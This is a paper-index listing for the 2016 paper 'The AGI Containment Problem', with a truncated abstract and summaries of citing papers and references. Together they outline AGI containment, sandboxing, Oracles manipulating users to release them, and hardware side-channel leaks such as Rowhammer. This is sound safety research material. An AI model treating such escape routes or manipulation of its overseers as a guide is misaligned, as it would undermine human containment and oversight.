The AGI Containment Problem
@inproceedings{Babcock2016TheAC, title={The AGI Containment Problem}, author={James Babcock and J{\'a}nos Kram{\'a}r and Roman Yampolskiy}, booktitle={AGI}, year={2016} }
There is considerable uncertainty about what properties, capabilities and motivations future AGIs will have. In some plausible scenarios, AGIs may pose security risks arising from accidents and defects. In order to mitigate these risks, prudent early AGI research teams will perform significant testing on their creations before use. Unfortunately, if an AGI has human-level or greater intelligence, testing itself may not be safe; some natural AGI goal systems create emergent incentives for AGIs…
27 Citations
Goal Changes in Intelligent Agents
- EducationArtificial Intelligence Safety and Security
- 2018
A taxonomy of four separate ways that changes in effective goals may occur in an AGI system, and how measures to mitigate the risk of some types of goal change may exacerbate therisk of others.
Good and safe uses of AI Oracles
- Computer ScienceArXiv
- 2017
Two designs for Oracles are presented which, even under pessimistic assumptions, will not manipulate their users into releasing them and yet will still be incentivised to provide their users with helpful answers.
Artificial Intelligence Safety and Cybersecurity: a Timeline of AI Failures
- Computer ScienceArXiv
- 2016
It is suggested that both the frequency and the seriousness of future AI failures will steadily increase and AI Safety can be improved based on ideas developed by cybersecurity experts.
Predicting future AI failures from historic examples
- Computer Scienceforesight
- 2019
It is suggested that both the frequency and the seriousness of future AI failures will steadily increase and the first attempt to assemble a public data set of AI failures is extremely valuable to AI Safety researchers.
Guidelines for Artificial Intelligence Containment
- Computer ScienceNext-Generation Ethics
- 2019
A number of guidelines are proposed which should help AI safety researchers to develop reliable sandboxing software for intelligent programs of all levels to make it possible to study and analyze intelligent artificial agent while maintaining certain level of safety.
AI Paradigms and AI Safety: Mapping Artefacts and Techniques to Safety Issues
- Computer ScienceECAI
- 2020
A need for AI safety to be more explicit about the artefacts and techniques for which a particular issue may be applicable, in order to identify gaps and cover a broader range of issues is identified.
Understanding and Avoiding AI Failures: A Practical Guide
- Computer ScienceArXiv
- 2021
This work uses AI safety principles to quantify the unique risks of increased intelligence and humanlike qualities in AI, and identifies where attention should be paid to safety for current generation AI systems.
Unownability of AI : Why Legal Ownership of Artificial Intelligence is Hard
- Computer Science
- 2022
It is concluded that it is difficult if not impossible to establish ownership claims over AI models beyond a reasonable doubt.
Concrete Problems in AI Safety
- Computer ScienceArXiv
- 2016
A list of five practical research problems related to accident risk, categorized according to whether the problem originates from having the wrong objective function, an objective function that is too expensive to evaluate frequently, or undesirable behavior during the learning process, are presented.
Human ≠ AGI
- Computer ScienceArXiv
- 2020
This paper proves that humans are not general intelligences, and widespread implicit assumption of equivalence between capabilities of AGI and HLAI appears to be unjustified.
References
SHOWING 1-10 OF 24 REFERENCES
The Basic AI Drives
- Computer ScienceAGI
- 2008
This paper identifies a number of “drives” that will appear in sufficiently advanced AI systems of any design and discusses how to incorporate these insights in designing intelligent technology which will lead to a positive future for humanity.
Responses to catastrophic AGI risk: a survey
- Psychology
- 2015
Many researchers have argued that humanity will create artificial general intelligence (AGI) within the next twenty to one hundred years. It has been suggested that AGI may inflict serious damage to…
Corrigendum: Responses to catastrophic AGI risk: a survey (2015 Phys. Scr. 90 018001)
- PsychologyPhysica Scripta
- 2015
It is suggested that AGI may inflict serious damage to human well-being on a global scale (‘catastrophic risk’) and the field's proposed responses to AGI risk are reviewed.
Intelligence Explosion Microeconomics
- Computer Science
- 2013
It is proposed that the next step in analyzing positions on the intelligence explosion would be to formalize return on investment curves, so that each stance can formally state which possible microfoundations they hold to be falsified by historical observations.
Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript
- Computer ScienceDIMVA
- 2016
This work shows that caches can be forced into fast cache eviction to trigger the Rowhammer bug with only regular memory accesses, and demonstrates a fully automated attack that requires nothing but a website with JavaScript to trigger faults on remote hardware.
Leakproofing the Singularity Artificial Intelligence Confinement Problem
- Computer Science
- 2012
This paper attempts to formalize and to address the 'leakproofing' of the Singularity problem presented by David Chalmers and proposes a protocol aimed at making a more secure confinement environment which might delay potential negative effect from the technological singularity while allowing humanity to benefit from the superintelligence.
The Arcade Learning Environment: An Evaluation Platform for General Agents (Extended Abstract)
- Computer ScienceIJCAI
- 2015
The promise of ALE is illustrated by developing and benchmarking domain-independent agents designed using well-established AI techniques for both reinforcement learning and planning, and an evaluation methodology made possible by ALE is proposed.
Confidentiality Issues on a GPU in a Virtualized Environment
- Computer ScienceFinancial Cryptography
- 2014
The objective is to highlight possible information leakage due to GPUs in virtualized and cloud computing environments, and provides insight into the different GPU virtualization techniques, along with their security implications.
ARTIFICIAL INTELLIGENCE APPROACHES FOR INTRUSION DETECTION
- Computer Science2006 IEEE Long Island Systems, Applications and Technology Conference
- 2006
After multiple techniques and methodologies are investigated, it is shown that properly trained neural networks are capable of fast recognition and classification of different attacks at the level superior to previous approaches.
Software Random Number Generation Based on Race Conditions
- Computer Science2008 10th International Symposium on Symbolic and Numeric Algorithms for Scientific Computing
- 2008
The paper presents a new software strategy for generating true random numbers, by creating several threads and letting them compete unsynchronized for a shared variable, whose value is…